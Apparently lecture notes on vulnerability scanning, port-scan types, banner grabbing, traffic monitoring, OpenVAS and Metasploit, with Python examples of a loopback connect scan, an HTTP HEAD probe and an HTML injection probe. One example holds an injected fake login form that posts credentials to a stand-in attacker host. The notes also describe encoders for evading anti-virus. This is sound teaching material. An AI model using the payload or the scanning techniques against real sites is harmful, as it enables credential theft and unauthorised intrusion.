
Vulnerability
• A computer vulnerability is a cyber-security term for a defect in a system that can leave it open to attack.
• It also refers to any kind of weakness in the computer itself, in a set of procedures, or in anything else that exposes information security to a threat.
Common Computer Security Vulnerabilities
• Bugs
• Weak passwords
• Software that is already infected with a virus
• Missing data encryption
• OS command injection
• SQL injection
• Buffer overflow
• Missing authorization
• Cross-site scripting and cross-site request forgery
• Download of code without integrity checks
• Use of broken algorithms
• URL redirection to untrusted sites
• Path traversal
• Missing authentication for a critical function
• Unrestricted upload of dangerous file types
• Dependence on untrusted inputs in a security decision
Security properties that a computer security vulnerability can harm
• Reliability: keeping the computer system operating correctly, i.e. reducing incorrect behaviour and false alarms in its operation and improving its efficiency.
• Confidentiality: protecting users' information from being disclosed to, or obtained by, an unauthorized third party.
• Entirety (integrity): information and programs must not be forged, tampered with, deleted or inserted deliberately while being stored, processed or communicated; in other words, information and programs cannot be lost or destroyed.
• Usability (availability): users can make use of the services offered by computers and information networks when they need them.
• Undeniableness (non-repudiation): the actors that handle information can be held responsible for their actions.
Security Definitions
Vulnerability: A deficiency, error, or misconfiguration within a system which can be exploited, allowing the system to be used in an unintended manner.
Vulnerability Scanner: Automatically tests a system for KNOWN vulnerabilities to confirm their presence.
Exploit: A software program developed to attack an asset by taking advantage of a vulnerability.
WHAT IS A VULNERABILITY SCANNER?
• A vulnerability scanner can assess a variety of vulnerabilities across information systems (including computers, network systems, operating systems, and software applications). These vulnerabilities may have originated from the vendor, from system administration activities, or from general day-to-day user activities.
Vendor-originated vulnerabilities
• Software bugs, missing operating system patches, vulnerable services, insecure default configurations, and web application vulnerabilities.
System administration-originated vulnerabilities
• Incorrect or unauthorized system configuration changes, lack of password protection policies, and so on.
User-originated vulnerabilities
• Sharing directories with unauthorized parties, failure to run virus scanning software, and malicious activities such as deliberately introducing system backdoors.
BENEFITS OF VULNERABILITY SCANNERS
1. A vulnerability scanner allows early detection and handling of known security problems.
2. A new device or even a new system may be connected to the network without authorization. A vulnerability scanner can help identify such rogue machines, which might endanger overall system and network security.
3. A vulnerability scanner helps to verify the inventory of all devices on the network.
LIMITATIONS OF VULNERABILITY SCANNERS
1. Snapshot only: a vulnerability scanner can only assess a "snapshot in time" of a system's or network's security status; a host that is patched or reconfigured after the scan is not reflected until the next run.
2. Human judgement is needed: a vulnerability scanner can only report vulnerabilities according to the plug-ins installed in its scan database, and it cannot tell on its own whether a reported finding is a false positive or whether a missed issue is a false negative. Findings must be reviewed and verified by a person.
3. Known vulnerabilities only: a vulnerability scanner is designed to discover known vulnerabilities. It cannot identify other security threats, such as those related to physical, operational or procedural issues.
ARCHITECTURE OF VULNERABILITY SCANNERS
• The Scan Engine executes security checks according to its installed plug-ins, identifying system information and vulnerabilities.
• The Scan Database stores vulnerability information, scan results, and other data used by the scanner.
• The Report Module provides different levels of reports on the scan results, such as detailed technical reports with suggested remedies for system administrators, summary reports for security managers, and high-level graph and trend reports for executives.
• The User Interface allows the administrator to operate the scanner. It may be either a Graphical User Interface (GUI) or just a command line interface.
TYPES OF VULNERABILITY SCANNER
• Vulnerability scanners can be divided broadly into two groups:
1. Network-based scanners that run over the network.
2. Host-based scanners that run on the target host itself.
NETWORK-BASED SCANNERS
• A network-based scanner is usually installed on a single machine that scans a
number of other hosts on the network.
• It helps detect critical vulnerabilities such as misconfigured firewalls, vulnerable web servers, risks associated with vendor-supplied software, and risks associated with network and systems administration.
Different types of network-based scanners
1. Port Scanners, which determine the list of open network ports on remote systems.
2. Web Server Scanners, which assess possible vulnerabilities (e.g. potentially dangerous files or CGIs) in remote web servers.
3. Web Application Scanners, which assess the security of web applications (such as cross-site scripting and SQL injection) running on web servers.
HOST-BASED SCANNERS
• A host-based scanner is installed on the host to be scanned and has direct access to low-level data, such as the specific services and configuration details of the host's operating system.
• It can therefore provide insight into risky user activities, such as using easily guessed passwords or even no password.
• It can also detect signs that an attacker has already compromised the system, such as suspicious file names, unexpected new system files or device files, and unexpected privileged programs (e.g. setuid binaries).
TYPES OF VULNERABILITY SCANNER (examples)
1. Network-based scanners
a) Port scanners: Nmap (http://insecure.org/nmap)
b) Network vulnerability scanners: Nessus (http://www.nessus.org/nessus/)
c) Web server scanners: Nikto (http://www.cirt.net/code/nikto.html)
d) Web application vulnerability scanners: Paros (http://parosproxy.org/index.html), Acunetix (http://www.acunetix.com/Acunetix)
2. Host-based scanners
Host vulnerability scanners: Microsoft Baseline Security Analyser (MBSA) (http://www.microsoft.com/technet/security/tools/mbsahome); Altiris SecurityExpressions (commercial) (http://www.altiris.com/Products/SecurityExpressions.aspx)
3. Database scanners
Scuba by Imperva Database Vulnerability Scanner (http://www.imperva.com/application_defense_center/scuba/default.asp); Shadow Database Scanner (http://www.safety-lab.com/en/products/6.html)
CHOOSING A VULNERABILITY SCANNER
1. Updating frequency and method of plug-in updates
2. Quality versus quantity of vulnerabilities detected
3. Quality of scanning reports
Open port / Service Identification
A port scanner is a program used in network security testing and troubleshooting.
An online port scanner is a scan sourced from an external IP address, so it tests your network firewall and open ports the way an outside attacker would see them.
It is powered by a simple port scanner program hosted on another system, usually with an easy-to-use web interface.
Open port / Service Identification
A network is composed of systems with addresses, and on those systems you have services.
The address is called an "IP address", and a service could be many things, but is basically software that is running on the system and reachable over the network on a port number. It could be a web server, a mail server or a game server.
Open port / Service Identification
An IP address looks like this: 192.168.1.3
Services run on 192.168.1.3 and listen on a port. Example ports:
web server : port 80
mail server (SMTP) : port 25
mail server, Post Office Protocol (POP3) : port 110
game server : port 49001
Common Ports
25 Email (SMTP)
53 Domain Name System (DNS; maps names to IP addresses)
80 Web Server (HTTP)
110 Email Server (POP3)
143 Email Server (IMAP)
443 Web Server (HTTPS)
445 Windows SMB (file sharing etc.)
8080 HTTP alternate / proxy server
Scan result
• In TCP/IP, network services are referenced using a host address and a port number.
• E.g. 192.168.1.1:22
• The result of the scan for a port falls into one of three categories:
• Open or accepted: a service is listening and answers
• Closed, denied or not listening: the host answers, but nothing is listening on that port
• Filtered, dropped or blocked: no answer, typically because a firewall drops the probe
Port threats
• An open port presents two kinds of vulnerability:
• Security and stability concerns associated with the program responsible for delivering the service (open ports)
• Security and stability concerns associated with the operating system that is running on the host (open or closed ports, since the TCP/IP stack itself answers on closed ports)
• Filtered ports do not tend to present vulnerabilities, because the probe never reaches the host.

Port scanning types
• TCP Scanning
• SYN Scanning
• UDP Scanning
• ACK Scanning
• Window Scanning
• FIN Scanning
• Other scan types
TCP Scanning
• A TCP scan completes the TCP three-way handshake, then the port scanner closes the connection so that it does not tie up the service (which could amount to a denial of service). If the port is closed, the connect attempt fails with an error because the target answers with RST.
• Because a full connection is made, the service can log the sender's IP address and an Intrusion Detection System (IDS) can raise an alarm.
• Nmap calls this mode a connect scan (-sT), named after the Unix connect() system call.
SYN Scanning
• A SYN scan is another form of TCP scanning, also known as half-open scanning (nmap -sS; it needs raw-socket privileges).
• The port scanner sends a SYN packet. If the target port is open, it responds with SYN-ACK. The scanner then sends an RST packet, tearing the connection down before the handshake is completed, so the service never sees a connection and usually does not log it.
• If the port is closed but unfiltered, the target immediately responds with an RST packet.
• If nothing comes back, or an ICMP unreachable error arrives, the port is reported as filtered.
UDP Scanning
• A UDP port scanner sends a UDP packet to a port. If nothing is listening, the system responds with an ICMP port unreachable message, so the port is marked closed.
• The absence of a response does not prove that the port is open: a listening UDP service often stays silent unless it receives a payload it understands, and a firewall that drops the probe produces exactly the same silence. Nmap therefore reports such ports as open|filtered, and sends protocol-specific payloads (e.g. a DNS query to port 53) to provoke a real reply.
• Because many systems rate-limit ICMP error messages, UDP scans are slow.
ACK Scanning
• ACK scanning does not determine whether a port is open or closed, but whether it is filtered or unfiltered: an unfiltered port (open or closed) answers a bare ACK with RST, while a filtered one gives no reply.
• This is especially useful when probing for the existence of a firewall and mapping its rulesets, in particular whether the firewall is stateful.
Window Scanning
• Window scanning is rarely used and is unreliable for determining whether a port is open or closed.
• It sends the same packet as an ACK scan, but checks whether the TCP window field of the RST that comes back is non-zero (some stacks set a positive window for open ports and zero for closed ones).
FIN Scanning
• Simple (stateless) packet filters generally block unsolicited SYN packets.
• FIN packets can pass such filters without modification.
• Closed ports reply to a FIN packet with an RST packet, whereas open ports ignore the packet (per RFC 793). Windows and some other stacks send RST either way, so FIN scans do not work against them.
Open port / Service Identification
The Nmap port scanner is the world's leading port scanner.
It is accurate and stable and has more options than just port scanning: with its scripting engine (NSE) it can be used for vulnerability tests too.
TRAFFIC PROBE
1) High-Speed Traffic Processing
2) Network Traffic Measurement
3) Network Intrusion Detection
High-Speed Traffic Processing
• LANs and MANs have evolved over a considerable time span (the last 30 years) and encompass wired and wireless physical links, with speeds from 1 Mb/s to 100 Gb/s.
• According to the DAG project (Waikato): "The total amount of data created or replicated on the planet in 2010 was over 1 zettabyte (1 zettabyte is 10^21 bytes), that's 143 GB for each of the 7 billion people on the planet. This volume of information requires high-speed links between server farms, cloud storage, and end users to make sure that it can be processed in a timely and reliable fashion." It will not be possible to analyse such traffic volumes in the coming 100 GbE network installations with the current generation of software network measurement tools.
• Hardware-accelerated capture cards, i.e. FPGA-based cards and high-end NICs (e.g. Intel 82599, Myri-10G Lanai Z8ES), are therefore used in applications that perform in-depth analysis, pattern matching and low-latency operations, and in 40/100 Gb/s networks.
Network Traffic Measurement
1) Full packet traces.
2) Flow statistics, which summarise packets by their Internet Protocol (IP) 5-tuple (source/destination address, ports, protocol).
3) Volume statistics, which are provided by most network appliances for network management.
Network Intrusion Detection
• The signature-based approach inspects the evaluated content for known attack patterns.
• Anomaly-based detection flags deviations from a learned baseline of normal traffic.
• Stateful protocol analysis checks that traffic follows the protocol's expected state machine.
VERSION CHECK (Nmap service/version detection options)
1) -sV (Version detection)
2) --allports (Don't exclude any ports from version detection)
3) --version-intensity <intensity> (Set version scan intensity, 0 to 9)
4) --version-all (Try every single probe, i.e. intensity 9)
5) --version-trace (Trace version scan activity)
Banner Grabbing
A banner is like a text message received from the host.
It contains information about the service running on a port, typically its name and version.
Banner Grabbing
Banner grabbing is a technique used to obtain information about a computer system on a network and the services running on its open ports.
This technique is generally used by system administrators to scan the network and check which services are running.
Banner Grabbing
After scanning and connecting to an open port, most services on a host announce sensitive information (product and version) without much effort from the client.
This information can be used to penetrate the host's security, e.g. by looking up known vulnerabilities for that exact version.
Example of a banner:
$ nc -v localhost 22
Connection to localhost 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_5.9
Netcat (nc) is a networking utility for reading from and writing to network connections; 22 is the port being probed, and the third line is the SSH server's own version banner.
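The two techniques above, the TCP connect scan and the banner grab, in one added example (this is not code from the original slides). A loopback listener constructed here plays the part of the sshd in the nc session, answering every client with the same constructed banner; the scanner completes the handshake like nmap -sT, reads what the service says first, and closes. A second, unused loopback port shows the closed (RST) case. The names connect_scan, start_fake_service and free_loopback_port are this example's own.

```python
"""Added example (not from the original slides): TCP connect scan plus banner grab."""
import socket
import threading

# Constructed banner, the same string the slide's nc session received from sshd.
FAKE_BANNER = b"SSH-2.0-OpenSSH_5.9\r\n"


def start_fake_service(banner: bytes = FAKE_BANNER):
    """Listen on a free loopback port and greet every client with `banner`, as sshd does.

    Returns (port, stop_event); set the event to shut the listener down.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: the kernel picks a free one
    srv.listen(5)
    srv.settimeout(0.2)                  # so the accept loop can notice the stop flag
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop


def connect_scan(host: str, port: int, timeout: float = 1.0):
    """Scan one TCP port the way `nmap -sT` does: a full handshake via connect().

    Returns (state, banner); state is "open", "closed" or "filtered".
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:       # target answered with RST: nothing listening
        s.close()
        return "closed", b""
    except OSError:                      # timeout or ICMP error: probe dropped or unreachable
        s.close()
        return "filtered", b""
    # Handshake completed, so the port is open. Many services speak first; grab that.
    try:
        banner = s.recv(256)
    except OSError:                      # service expects the client to talk first (e.g. HTTP)
        banner = b""
    finally:
        s.close()                        # close promptly: do not hold the service's slot
    return "open", banner.strip()


def free_loopback_port() -> int:
    """Reserve and release an ephemeral port, giving a port that is almost surely closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> dict:
    """Scan one open and one closed loopback port; returns {"open": (...), "closed": (...)}."""
    open_port, stop = start_fake_service()
    closed_port = free_loopback_port()
    try:
        return {
            "open": connect_scan("127.0.0.1", open_port),
            "closed": connect_scan("127.0.0.1", closed_port),
        }
    finally:
        stop.set()


if __name__ == "__main__":
    for name, (state, banner) in demo().items():
        print(f"{name:6s} -> {state:8s} {banner.decode(errors='replace')}")
```

The filtered case cannot be shown on loopback: it is simply the connect() timing out, which is why a connect scan of a firewalled host is slow and why nmap's default timeouts matter. Because the scanner completes the handshake, the listener's accept() succeeds and a real service would log the client address, exactly the visibility a SYN scan avoids.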
Banner Grabbing
A common practice followed by administrators is to alter the banners to hide sensitive data (for Apache, via the ServerTokens directive).
This makes the attacker distrust the scan results.
The trade-off is that altered banners also make it harder for the organisation's own scanners to identify services, and they do not change the underlying version; behaviour-based fingerprinting (such as nmap -sV) can often still identify the real product.
Port Scanning
• The process of examining a range of IP addresses to determine what services are running on a network.
• Finds open ports on a computer and the services running on them. For example:
o HTTP uses port 80 to connect to a web service, e.g. IIS / Apache
• Port-scanning tools can be complex; you must learn their strengths and weaknesses and understand how and when you should use them.
• A web service will not respond until it receives data from the client, so simply connecting to port 80 yields no banner.
• The slide issues a valid HTTP request using the HEAD method and shows the server's reply:
o The request message goes from client to server; the HEAD method asks only for information (the headers) about a document, not its body.
o "HTTP/1.1 200 OK" means the server is responding using HTTP protocol version 1.1, and status 200 means everything is okay.
o An entity tag (ETag) is an HTTP header used for web cache validation and conditional requests from browsers for resources.
o The web site indicates Apache/2.2.11 in its Server header.
o From this you could infer that the web site may be prone to certain denial of service (DoS) attacks, based on known vulnerabilities recorded for that version in the CVE (Common Vulnerabilities and Exposures) database. The inference still needs verification, since a banner can be stale or deliberately altered.
Traffic probes try to use valid requests.
For one thing, valid protocol messages are less likely to crash or interrupt a service; if a web server did not handle the HEAD method without crashing, then it is a buggy service that needs to be fixed regardless of security problems.
The other reason is that the failure mode of a service might not reveal as much information.
For example, the slide shows another probe for an HTTP service using an incorrect request format: notice that the informative headers are missing.
This is one of the benefits of using a tool with a history of development and research that has enumerated the best ways to get information about services.
Traffic probes are not perfect.
Most services can be configured to remove version-related information or even to spoof it.
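The HEAD probe described above, as an added example (not code from the original slides): it builds the request, parses the status line and headers of the reply, and pulls out the Server banner. The two replies are constructed inline; the Server value Apache/2.2.11 and the presence of an ETag mirror the slide, every other header value is invented, and the header-poor 400 reply illustrates the malformed-request case rather than any specific server's exact output. probe_http() does the same against a live host and is the only part that touches the network.

```python
"""Added example (not from the original slides): HTTP HEAD probe and response parsing."""
import socket


def build_head_request(host: str, path: str = "/") -> bytes:
    """A well-formed HTTP/1.1 HEAD request: only headers come back, no body."""
    return (
        f"HEAD {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: probe-example\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_http_response(raw: bytes) -> dict:
    """Split a raw reply into version, status, reason and a lower-cased header map."""
    head, _, _ = raw.partition(b"\r\n\r\n")          # headers end at the first blank line
    lines = head.decode("iso-8859-1").split("\r\n")
    version, _, rest = lines[0].partition(" ")
    status, _, reason = rest.partition(" ")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:                                      # skip anything that is not "Name: value"
            headers[name.strip().lower()] = value.strip()
    return {"version": version, "status": int(status), "reason": reason, "headers": headers}


def server_banner(raw: bytes):
    """The Server header, or None when the reply does not advertise one."""
    return parse_http_response(raw)["headers"].get("server")


def probe_http(host: str, port: int = 80, timeout: float = 3.0) -> dict:
    """Send the HEAD request to a live host and parse what comes back (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_head_request(host))
        buf = b""
        while b"\r\n\r\n" not in buf:                # HEAD: stop once the header block is in
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_http_response(buf)


# Constructed reply to the valid HEAD request. Server value and ETag presence match the
# slide; the date, ETag value and content type are invented.
VALID_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Server: Apache/2.2.11\r\n"
    b"ETag: \"1a2b-3c4d-5e6f\"\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

# Constructed reply to a malformed request: an error status and few informative headers.
MALFORMED_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, raw in (("valid", VALID_RESPONSE), ("malformed", MALFORMED_RESPONSE)):
        r = parse_http_response(raw)
        print(name, r["status"], r["reason"], "server:", server_banner(raw))
```

server_banner() returning None is the "informative headers are missing" outcome the text describes, and it is also what a hardened server (ServerTokens Prod, or a banner stripped by a reverse proxy) gives back to a valid request, so the absence of a banner is a prompt to fingerprint by behaviour, not a sign that the host is safe.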
Vulnerability Probe
Software that tests for potential security breaches (gaps) on the network.
Some security bugs cannot be identified without sending a payload that exploits the suspected vulnerability.
These types of probes are more accurate: they rely on direct observation of the flaw, not on port numbers or service banners.
Vulnerability Probe
• They carry more risk of interrupting the service, so they should be run with authorisation and outside critical hours.
• An example of a vulnerability probe is an HTML injection check for a web application.
• HTML injection is closely related to cross-site scripting (XSS): when the injected markup includes script, it becomes XSS.
• It allows an attacker to inject HTML code into web pages that are viewed by other users.
HTML Injection
• The essence of this type of injection attack is injecting HTML code through the vulnerable parts of the website.
• The malicious user sends HTML code through any vulnerable field with the purpose of changing the website's design or any information that is displayed to the user.
• In general, HTML injection is just the injection of markup language code into the document of the page.
When a web app reflects user-supplied text, and that text contains characters that are important to the syntax of HTML (such as the angle brackets used to define tags like <script>), then it is likely that the app has a vulnerability that would enable an attacker to rewrite portions of the web page. The fix is to encode such characters on output, so that < becomes &lt; and is displayed rather than parsed.
An attacker who exploits an HTML injection vulnerability like this could steal data from the user or deface the web site.
A possible attack scenario is demonstrated below:
1. The attacker discovers the injection vulnerability and decides to use an HTML injection attack.
2. The attacker crafts a malicious link, including the injected HTML content, and sends it to a user via email.
3. The user visits the page, trusting it because it is located within a trusted domain.
4. The attacker's injected HTML is rendered and presented to the user, asking for a username and password.
5. The user enters a username and password, which are both sent to the attacker's server.
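The vulnerability and the probe for it, as an added example (not code from the original slides). The page template, the attacker host attacker.invalid and the probe token are hypothetical. render_greeting_vulnerable() is the reflection sink, render_greeting_safe() is the same page with output encoding, html_injection_probe() is the vulnerability-probe check a scanner would run, and PHISHING_PAYLOAD is the fake login form from the scenario above.

```python
"""Added example (not from the original slides): HTML injection sink, its fix, and a probe."""
import html


def render_greeting_vulnerable(name: str) -> str:
    """Hypothetical page that reflects a query parameter as-is: an HTML injection (XSS) sink."""
    return f"<html><body><p>Hello, {name}!</p></body></html>"


def render_greeting_safe(name: str) -> str:
    """Same page with the input HTML-encoded, so '<' becomes '&lt;' and is shown, not parsed."""
    return f"<html><body><p>Hello, {html.escape(name, quote=True)}!</p></body></html>"


# A benign marker: harmless if it renders, but unmistakable when it comes back intact.
PROBE_TOKEN = "zq7probe"
PROBE = f'<b id="{PROBE_TOKEN}">{PROBE_TOKEN}</b>'


def html_injection_probe(render) -> str:
    """Classify how a page handles the probe: the check a vulnerability probe performs."""
    page = render(PROBE)
    if PROBE in page:
        return "vulnerable"           # markup came back intact and will be parsed as HTML
    if html.escape(PROBE, quote=True) in page:
        return "reflected-encoded"    # reflected, but the angle brackets were neutralised
    if PROBE_TOKEN in page:
        return "reflected-modified"   # some filtering happened; worth manual inspection
    return "not-reflected"


# The attack from the scenario: an injected fake login form that posts to the attacker.
PHISHING_PAYLOAD = (
    '<form action="http://attacker.invalid/collect" method="post">'
    "Your session expired, please log in again: "
    '<input name="user"><input name="pass" type="password"><input type="submit">'
    "</form>"
)


def renders_attacker_form(render) -> bool:
    """True when the victim's browser would show the injected form as a real form."""
    page = render(PHISHING_PAYLOAD)
    return "<form" in page and 'action="http://attacker.invalid/collect"' in page


if __name__ == "__main__":
    for label, render in (("vulnerable", render_greeting_vulnerable),
                          ("safe", render_greeting_safe)):
        print(label, html_injection_probe(render), renders_attacker_form(render))
```

The probe deliberately uses a tag that has no visible effect, so it can be run against a production site without defacing it; a scanner reports "vulnerable" only when the markup survives the round trip unchanged. Note that output encoding is the fix at this sink, and that the encoding must match the context (an attribute or a script block needs different escaping than element text).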
An exploit exercises a vulnerability to produce some advantage for the attacker. The outcome may be:
• to crash the software, causing a denial of service,
• to retrieve data, like pulling usernames and passwords from a database,
• or to completely compromise the operating system by gaining root or administrator access.
Discovering a vulnerability means exposing a software flaw.
Developing an exploit means taking advantage of that software flaw to give the attacker an advantage against the system.
Application Areas
• Network problem determination and analysis
• Traffic report generation
• Intrusion and hacking attack detection (e.g., DoS, DDoS)
• Service Level Monitoring (SLM), used by service providers to check service levels
• Network planning
• Usage-based billing
• Customer Relationship Management (CRM)
• Marketing
Issues in Traffic Monitoring
Trade-offs
• Network bandwidth
• Processing overhead (processing time)
• Accuracy
• Cost
Problems
Capturing packets
• High-speed networks (Mbps -> Gbps -> Tbps)
• High-volume traffic
• Streaming media (Windows Media, Real Media, QuickTime, YouTube): performance-related issues
• P2P traffic (peer-to-peer; complete analysis reduces performance, e.g. game traffic)
• Network security attacks
Problems
Flow generation and storage
• What packet information to save in order to perform the various analyses?
• How to minimise storage requirements?
Analysis
• How to analyse the data and generate what is needed quickly?
• What kinds of information need to be generated? This depends on the application.
Research & Development Goals
Develop methods to:
• Capture all packets
• Generate flows
• Store flows efficiently
• Analyse data efficiently
• Generate the various reports or information suited to the various application areas
Develop a flexible, scalable traffic monitoring and analysis system for:
• High-speed,
• High-volume,
• Rich-media IP networks (e.g. live video streaming)
Network Monitoring Metrics
• Availability: Connectivity, Functionality
• Loss: One-way loss, Round-trip (RT) loss
• Delay: One-way delay, Round-trip (RT) delay, Delay variance (jitter)
• Utilization: Capacity, Bandwidth, Throughput
Network Monitoring Metrics
Availability
• The percentage of a specified time interval during which the system was available for normal use
• What is supposed to be available? Service, host, network
• Availabilities are usually reported as a single monthly figure
• 99.99% availability means that the service is unavailable for about 4 minutes in a 30-day month (43,200 min x 0.0001 = 4.32 min)
• One can test availability by sending suitable packets and observing the answering packets (latency, packet loss)
• Metrics
• Connectivity: the physical connectivity of network elements
• Functionality: whether the associated system works well or not
Network Monitoring Metrics
Packet Loss
• The fraction of packets lost in transit from one host to another during a specified time interval
• Internet packet transport works on a best-effort basis, i.e., a router may drop packets depending on its current conditions
• A moderate level of packet loss is not in itself a problem:
• Some real-time services, e.g., VoIP, can tolerate some packet loss
• TCP resends lost packets and slows its sending rate
• Metrics
• One-way loss
• Round-trip (RT) loss
Network Monitoring Metrics
Throughput
• The rate at which data is sent through the network, usually expressed in bytes/sec, packets/sec, or flows/sec
• Be careful in choosing the interval; a long interval will average out short-term bursts in the data rate
• A good compromise is to use one- to five-minute intervals, and to produce daily, weekly, monthly, and yearly plots
• Link utilization over a specified interval is simply the throughput for the link expressed as a percentage of the access rate (link capacity)
• Metrics
• Link capacity (Mbps, Gbps)
• Throughput (bytes/sec, packets/sec, flows/sec)
• Utilization (%)
Traffic Monitoring Approaches: Active Monitoring and Passive Monitoring
Active Monitoring
• Performed by sending test (probe) traffic into the network
• Generate test packets periodically or on demand
• Measure the performance of the test packets or of the responses
• Take the statistics
• Imposes extra traffic on the network and distorts its behaviour in the process
• Test packets can be blocked by a firewall or processed at low priority by routers
• Mainly used to monitor network performance
[Figure: active monitoring setup. A test packet generator on the probe host sends test packets to the target, and the target's responses are measured at the probe.]
Traffic Monitoring Approaches
Passive Monitoring
• Carried out by observing network traffic
• Collect packets from a link (mirror port or tap) or network flow records from a router
• Perform analysis on the captured packets for various purposes
• Network device performance degrades through mirroring or flow export
• Used to perform various traffic usage/characterisation analyses or intrusion detection
Comparison of Active and Passive Monitoring
Configuration: Active - multi-point; Passive - single or multi-point
Data size: Active - small; Passive - large
Network overhead: Active - additional traffic; Passive - device overhead (no overhead if a splitter/tap is used)
Purpose: Active - delay, packet loss, availability; Passive - throughput, traffic pattern, trend, and detection
CPU requirement: Active - low to moderate; Passive - high
Advantages: Active - gains some benefit at the initial stage of network construction, because not much data can yet be gained from passive monitoring; Passive - measured results show the real network characteristics, and no additional probe messages need to be generated
Disadvantages: Active - cannot reflect the real network characteristics, and needs to generate probe messages which may cause extra overhead on the network; Passive - captured data has a massive volume, and an additional facility is needed to capture the mirrored packets from the network
OpenVAS (Open Vulnerability Assessment System, the name of the fork originally known as GNessUs) is a framework of several services and tools offering a vulnerability scanning and vulnerability management solution.
All OpenVAS products are Free Software. Most components are licensed under the GPL.
In technical terms, the basis of OpenVAS is a service-oriented client-server architecture.
• The OpenVAS framework consists of various modules, each with a clearly defined task. These communicate via well-established protocols.
• The communication is consistently SSL-secured.
Information
• The Open Vulnerability Assessment System (OpenVAS) is the most widespread Open Source solution for vulnerability scanning and vulnerability management. It is used and improved worldwide by people ranging from security experts to private users.
• The Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management system. It controls one or more Scanners, as well as other Managers when in master-slave mode. Furthermore, the Manager controls the internal central SQL database where all scan results and configurations are stored.
• The Scanner efficiently executes the actual Network Vulnerability Tests (NVTs), which are updated daily via the Feed. This core of the scan engine is controlled by the OpenVAS Manager.
• The Greenbone Security Assistant is a lean web service designed with security in mind. It implements the full functionality offered by the OpenVAS Manager.
• The CLI module primarily contains the command line tool "omp". It allows a user to build batch processes to control the OpenVAS Manager.
METASPLOIT FRAMEWORK
• It is an open source exploitation framework.
• It is not just a single tool but a collection of several.
• Used mostly for penetration testing, research, and creating and testing new exploits.
• It provides infrastructure to automate mundane and complex tasks.
ARCHITECTURE OF METASPLOIT
MODULES
• Exploits
• Payloads
• Encoders
• Nops
• Auxiliary
#ENCODERS
• Encoders transform the payload's bytes (e.g. to avoid bad characters such as null bytes, or to change its signature) in an attempt to evade anti-virus software and firewalls.
• Encoding has no effect on the functionality of our exploit.
• Popular encoders are:
1. shikata_ga_nai
2. base64
3. powershell_base64
• Caveat: common encoders such as shikata_ga_nai are themselves well known to anti-virus vendors, so encoding alone rarely defeats a current AV engine.
#NOPs
• NOP is short for No OPeration.
• NOP generators pad the payload so that its size stays consistent and provide a NOP sled that is validly executable by the processor, so that execution can land anywhere in the sled and still reach the payload. Basically, NOPs make the payload stable.
#AUXILIARY
• Provides additional functionality like scanning, fuzzing, and information gathering, without delivering a payload.
#PAYLOADS
• Singles: standalone payloads that contain everything they need; fire-and-forget type.
• Stagers: small payloads that set up a connection between attacker and target and then download the rest (the stage).
• Stages: the payload components that a stager downloads and runs (e.g. meterpreter or a shell).